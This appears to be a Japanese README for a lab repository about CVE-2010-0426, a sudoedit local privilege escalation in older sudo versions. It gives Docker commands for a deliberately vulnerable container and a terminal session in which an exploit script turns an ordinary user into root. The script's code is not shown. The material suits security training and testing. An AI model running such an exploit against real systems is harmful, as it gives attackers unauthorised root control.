
Sudo 1.6.x <= 1.6.9p21 および 1.7.x <= 1.7.2p4 ローカル権限昇格と脆弱なコンテナ
Sudo (su "do") は、システム管理者が特定のユーザー(またはユーザーグループ)に対して、すべてのコマンドと引数を記録しながら、一部(またはすべて)のコマンドを root として実行する権限を付与できるようにするツールです。
テスト用の脆弱な環境を構築するには、Docker のインストールが必要です。次のコマンドを実行するだけです:
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426
これにより、低権限ユーザーで対話型シェルが起動します。
このバグは sudoedit で見つかりました。sudoedit は 'sudoedit' コマンドを正しく処理しないため、悪意のあるユーザーが実際の sudoedit コマンドを任意のコマンドに置き換えることができます。
ローカルの攻撃者はこの問題を悪用して、'root' ユーザーとして任意のコマンドを実行できる可能性があります。攻撃が成功すると、影響を受けるコンピュータが完全に侵害される可能性があります。
このターゲットを悪用するには、次のコマンドを実行するだけです:
./exploit.sh
この脆弱なイメージを使用している場合は、次のコマンドを実行するだけです:
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#
この欠陥は Slouching によって発見されました。
本プログラムおよび以前のプログラムは教育目的のみを対象としています。許可なく使用しないでください。通常の免責事項が適用されます。特に、これらのプログラムによって提供される情報や機能を直接的または間接的に使用したことによるいかなる損害についても、私(t0kx)は責任を負いません。作者またはいかなるインターネットプロバイダーも、これらのプログラムまたはその派生プログラムの内容や誤用について一切責任を負いません。これらのプログラムを使用することにより、これらのプログラムの使用によって生じたいかなる損害(データ損失、システムクラッシュ、システム侵害など)も t0kx の責任ではないことを受け入れたものとみなされます。